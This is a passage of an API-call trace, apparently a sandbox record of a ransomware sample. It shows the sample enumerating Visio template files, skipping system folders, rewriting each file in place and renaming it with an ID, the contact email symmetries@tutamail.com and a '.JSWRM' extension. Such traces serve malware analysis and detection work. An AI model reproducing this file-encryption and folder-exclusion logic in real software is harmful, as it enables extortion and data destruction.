[0144.640] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xa326fd, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0xa326fd, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x11cbd0e, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x19d14, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="BASIC_U.VSSX", cAlternateFileName="BASIC_~1.VSS")) returned 1 [0144.640] lstrcmpiW (lpString1="BASIC_U.VSSX", lpString2=".") returned 1 [0144.640] lstrcmpiW (lpString1="BASIC_U.VSSX", lpString2="..") returned 1 [0144.640] lstrcmpiW (lpString1="BASIC_U.VSSX", lpString2="...") returned 1 [0144.640] lstrcmpiW (lpString1="BASIC_U.VSSX", lpString2="windows") returned -1 [0144.640] lstrcmpiW (lpString1="BASIC_U.VSSX", lpString2="recovery") returned -1 [0144.640] lstrcmpiW (lpString1="BASIC_U.VSSX", lpString2="perflogs") returned -1 [0144.640] lstrcmpiW (lpString1="BASIC_U.VSSX", lpString2="documents and settings") returned -1 [0144.640] lstrcmpiW (lpString1="BASIC_U.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0144.640] lstrcmpiW (lpString1="BASIC_U.VSSX", lpString2="system volume information") returned -1 [0144.640] lstrcmpiW (lpString1="BASIC_U.VSSX", lpString2="msocache") returned -1 [0144.640] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASIC_U.VSSX", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0144.640] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASIC_U.VSSX", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BASIC_U.VSSX", lpUsedDefaultChar=0x0) returned 12 [0144.640] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASIC_U.VSSX", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0144.640] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASIC_U.VSSX", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BASIC_U.VSSX", lpUsedDefaultChar=0x0) returned 12 [0144.640] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0144.640] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0144.640] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BASIC_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\basic_u.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0144.642] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=105748) returned 1 [0144.642] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.642] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x19d10, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x19d10, lpOverlapped=0x0) returned 1 [0144.651] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.651] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x19d10, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x19d10, lpOverlapped=0x0) returned 1 [0144.686] CloseHandle (hObject=0x314) returned 1 [0144.686] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BASIC_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\basic_u.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BASIC_U.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\basic_u.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0144.688] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4960aaf, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x4960aaf, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4960aaf, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xd8ef, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="BASIC_UMLSEQUENCE_M.VSTX", cAlternateFileName="BA86FE~1.VST")) returned 1 [0144.688] lstrcmpiW (lpString1="BASIC_UMLSEQUENCE_M.VSTX", lpString2=".") returned 1 [0144.688] lstrcmpiW (lpString1="BASIC_UMLSEQUENCE_M.VSTX", lpString2="..") returned 1 [0144.688] lstrcmpiW (lpString1="BASIC_UMLSEQUENCE_M.VSTX", lpString2="...") returned 1 [0144.688] lstrcmpiW (lpString1="BASIC_UMLSEQUENCE_M.VSTX", lpString2="windows") returned -1 [0144.688] lstrcmpiW (lpString1="BASIC_UMLSEQUENCE_M.VSTX", lpString2="recovery") returned -1 [0144.688] lstrcmpiW (lpString1="BASIC_UMLSEQUENCE_M.VSTX", lpString2="perflogs") returned -1 [0144.688] lstrcmpiW (lpString1="BASIC_UMLSEQUENCE_M.VSTX", lpString2="documents and settings") returned -1 [0144.689] lstrcmpiW (lpString1="BASIC_UMLSEQUENCE_M.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0144.689] lstrcmpiW (lpString1="BASIC_UMLSEQUENCE_M.VSTX", lpString2="system volume information") returned -1 [0144.689] lstrcmpiW (lpString1="BASIC_UMLSEQUENCE_M.VSTX", lpString2="msocache") returned -1 [0144.689] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASIC_UMLSEQUENCE_M.VSTX", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0144.689] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASIC_UMLSEQUENCE_M.VSTX", cchWideChar=24, lpMultiByteStr=0x2410d8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BASIC_UMLSEQUENCE_M.VSTX", lpUsedDefaultChar=0x0) returned 24 [0144.689] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASIC_UMLSEQUENCE_M.VSTX", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0144.689] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASIC_UMLSEQUENCE_M.VSTX", cchWideChar=24, lpMultiByteStr=0x240fe8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BASIC_UMLSEQUENCE_M.VSTX", lpUsedDefaultChar=0x0) returned 24 [0144.689] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0144.689] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0144.689] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BASIC_UMLSEQUENCE_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\basic_umlsequence_m.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0144.690] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=55535) returned 1 [0144.690] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.690] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0xd8e0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0xd8e0, lpOverlapped=0x0) returned 1 [0144.698] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.698] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xd8e0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0xd8e0, lpOverlapped=0x0) returned 1 [0144.698] CloseHandle (hObject=0x314) returned 1 [0144.699] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BASIC_UMLSEQUENCE_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\basic_umlsequence_m.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BASIC_UMLSEQUENCE_M.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\basic_umlsequence_m.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0144.700] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4960aaf, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x4960aaf, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4960aaf, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xceea, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="BASIC_UMLSEQUENCE_U.VSTX", cAlternateFileName="BA7B39~1.VST")) returned 1 [0144.700] lstrcmpiW (lpString1="BASIC_UMLSEQUENCE_U.VSTX", lpString2=".") returned 1 [0144.700] lstrcmpiW (lpString1="BASIC_UMLSEQUENCE_U.VSTX", lpString2="..") returned 1 [0144.700] lstrcmpiW (lpString1="BASIC_UMLSEQUENCE_U.VSTX", lpString2="...") returned 1 [0144.700] lstrcmpiW (lpString1="BASIC_UMLSEQUENCE_U.VSTX", lpString2="windows") returned -1 [0144.700] lstrcmpiW (lpString1="BASIC_UMLSEQUENCE_U.VSTX", lpString2="recovery") returned -1 [0144.700] lstrcmpiW (lpString1="BASIC_UMLSEQUENCE_U.VSTX", lpString2="perflogs") returned -1 [0144.700] lstrcmpiW (lpString1="BASIC_UMLSEQUENCE_U.VSTX", lpString2="documents and settings") returned -1 [0144.700] lstrcmpiW (lpString1="BASIC_UMLSEQUENCE_U.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0144.700] lstrcmpiW (lpString1="BASIC_UMLSEQUENCE_U.VSTX", lpString2="system volume information") returned -1 [0144.700] lstrcmpiW (lpString1="BASIC_UMLSEQUENCE_U.VSTX", lpString2="msocache") returned -1 [0144.701] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASIC_UMLSEQUENCE_U.VSTX", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0144.701] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASIC_UMLSEQUENCE_U.VSTX", cchWideChar=24, lpMultiByteStr=0x241358, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BASIC_UMLSEQUENCE_U.VSTX", lpUsedDefaultChar=0x0) returned 24 [0144.701] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASIC_UMLSEQUENCE_U.VSTX", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0144.701] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASIC_UMLSEQUENCE_U.VSTX", cchWideChar=24, lpMultiByteStr=0x2410d8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BASIC_UMLSEQUENCE_U.VSTX", lpUsedDefaultChar=0x0) returned 24 [0144.701] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0144.701] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0144.701] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BASIC_UMLSEQUENCE_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\basic_umlsequence_u.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0144.702] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=52970) returned 1 [0144.702] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.702] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0xcee0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0xcee0, lpOverlapped=0x0) returned 1 [0144.707] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.707] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xcee0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0xcee0, lpOverlapped=0x0) returned 1 [0144.708] CloseHandle (hObject=0x314) returned 1 [0144.708] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BASIC_UMLSEQUENCE_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\basic_umlsequence_u.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BASIC_UMLSEQUENCE_U.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\basic_umlsequence_u.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0144.709] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x3c43bbb, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x3c43bbb, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x3c43bbb, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xd7aa, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="BA_DEC_M.VSSX", cAlternateFileName="BA_DEC~2.VSS")) returned 1 [0144.709] lstrcmpiW (lpString1="BA_DEC_M.VSSX", lpString2=".") returned 1 [0144.709] lstrcmpiW (lpString1="BA_DEC_M.VSSX", lpString2="..") returned 1 [0144.709] lstrcmpiW (lpString1="BA_DEC_M.VSSX", lpString2="...") returned 1 [0144.709] lstrcmpiW (lpString1="BA_DEC_M.VSSX", lpString2="windows") returned -1 [0144.709] lstrcmpiW (lpString1="BA_DEC_M.VSSX", lpString2="recovery") returned -1 [0144.709] lstrcmpiW (lpString1="BA_DEC_M.VSSX", lpString2="perflogs") returned -1 [0144.709] lstrcmpiW (lpString1="BA_DEC_M.VSSX", lpString2="documents and settings") returned -1 [0144.709] lstrcmpiW (lpString1="BA_DEC_M.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0144.709] lstrcmpiW (lpString1="BA_DEC_M.VSSX", lpString2="system volume information") returned -1 [0144.709] lstrcmpiW (lpString1="BA_DEC_M.VSSX", lpString2="msocache") returned -1 [0144.709] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BA_DEC_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0144.709] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BA_DEC_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BA_DEC_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0144.709] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BA_DEC_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0144.709] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BA_DEC_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BA_DEC_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0144.709] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0144.709] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0144.709] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BA_DEC_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\ba_dec_m.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0144.711] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=55210) returned 1 [0144.711] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.711] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0xd7a0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0xd7a0, lpOverlapped=0x0) returned 1 [0144.716] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.716] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xd7a0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0xd7a0, lpOverlapped=0x0) returned 1 [0144.716] CloseHandle (hObject=0x314) returned 1 [0144.717] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BA_DEC_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\ba_dec_m.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BA_DEC_M.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\ba_dec_m.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0144.718] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xa326fd, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0xa326fd, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1218203, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xc568, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="BA_DEC_U.VSSX", cAlternateFileName="BA_DEC~1.VSS")) returned 1 [0144.718] lstrcmpiW (lpString1="BA_DEC_U.VSSX", lpString2=".") returned 1 [0144.718] lstrcmpiW (lpString1="BA_DEC_U.VSSX", lpString2="..") returned 1 [0144.718] lstrcmpiW (lpString1="BA_DEC_U.VSSX", lpString2="...") returned 1 [0144.718] lstrcmpiW (lpString1="BA_DEC_U.VSSX", lpString2="windows") returned -1 [0144.718] lstrcmpiW (lpString1="BA_DEC_U.VSSX", lpString2="recovery") returned -1 [0144.718] lstrcmpiW (lpString1="BA_DEC_U.VSSX", lpString2="perflogs") returned -1 [0144.718] lstrcmpiW (lpString1="BA_DEC_U.VSSX", lpString2="documents and settings") returned -1 [0144.718] lstrcmpiW (lpString1="BA_DEC_U.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0144.718] lstrcmpiW (lpString1="BA_DEC_U.VSSX", lpString2="system volume information") returned -1 [0144.718] lstrcmpiW (lpString1="BA_DEC_U.VSSX", lpString2="msocache") returned -1 [0144.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BA_DEC_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0144.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BA_DEC_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BA_DEC_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0144.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BA_DEC_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0144.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BA_DEC_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BA_DEC_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0144.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0144.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0144.718] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BA_DEC_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\ba_dec_u.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0144.719] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=50536) returned 1 [0144.719] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.720] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0xc560, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0xc560, lpOverlapped=0x0) returned 1 [0144.762] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.762] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xc560, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0xc560, lpOverlapped=0x0) returned 1 [0144.763] CloseHandle (hObject=0x314) returned 1 [0144.763] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BA_DEC_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\ba_dec_u.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BA_DEC_U.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\ba_dec_u.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0144.765] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d1f09b, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1d1f09b, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1d1f09b, 